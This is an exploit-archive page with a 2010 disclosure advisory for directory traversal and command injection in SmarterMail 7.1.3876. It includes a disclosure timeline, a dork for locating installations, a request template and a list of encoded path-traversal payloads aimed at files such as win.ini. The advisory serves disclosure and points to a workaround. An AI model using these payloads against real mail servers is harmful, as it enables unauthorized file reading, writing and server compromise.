SmarterMail 7.1.3876 Directory Traversal

SmarterMail 7.1.3876 Directory Traversal: Posted Sep 21, 2010; Authored by sqlhacker; SmarterMail version 7.1.3876 suffers from a directory traversal vulnerability.; tags | exploit, file inclusion; SHA-256 | ace2442491053747a431df1026f5e2044cc7284a386c1e83455a87398d2d70fa; Download | Favorite | View

SmarterMail 7.1.3876 Directory Traversal

  Vendor: smartertools.com SmarterMail 7.x (7.1.3876) | Bug : Directory
Traversal, OS Command Injection, Other Critcal Vulns
      ########################################################################
 
# Vendor: smartertools.com SmarterMail 7.x (7.1.3876)
# Date: 2010-09-12
# Author : sqlhacker – https://cloudscan.me
# Thanks to : Burp Suite Pro - engagement tool
# : FuzzDB
# Contact : h02332@gmail.com
# Home : https://cloudscan.me
# Dork : insite: SmarterMail Enterprise 7.1
# Bug : Directory Traversal, OS Command Injection, Other Critcal Vulns
# Tested on : SmarterMail 7.x (7.1.3876) // Windows 2008 /64/R2
# Vendor Contact - August 14, 2010
# -Multiple email exchanges with Vendor thru Labor Day 2010
# - Vendor took no action 9/1/2010
# - Public Disclosure with Workaround Solution Provided 9-4-2010
########################################################################
Source URL
https://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html
 
The default installation of SmarterMail is vulnerable to 1 (or more) of the
file fuzzing types contained within FuzzDB and Burp Suite Pro 1.3.08 as a
baseline analysis for exploit surface modeling.
 
Reduced to exploits, Directory Traversal, OS Injection and Execution.
Initial Exploit Requires user-level privs.
 
A malicious user seeking to exploit Browser Clients can launch attacks from
the User Home / Public Web Directory utilizing the SSL Certificate of the
Host Provider.
A malicious user seeking to exploit the Host Server can launch attacks as
Local File Inclusion or Remote File Inclusion and perform Operating System
Injections and Execution.
A malicious user can read and write directories, files and perform malicious
operations due to the default configuration of smartermail.
 
 
This is reduced to:   GET {Vulnerable SmarterMail
Site}/path/*payload*relative/path/to/target/file/
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
../../../../../../win.ini
../../../../../../SmarterMail/ExploitShells
../../../../../../SmarterMail/{Domain}/{(l)uzername)/PubPayloadDir/logo_25.jpg%../%../somewhere
to read/write
A workaround is posted in the Source URL
https://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

SmarterMail 7.1.3876 Directory Traversal

SmarterMail 7.1.3876 Directory Traversal

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SmarterMail 7.1.3876 Directory Traversal

Share This

SmarterMail 7.1.3876 Directory Traversal

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems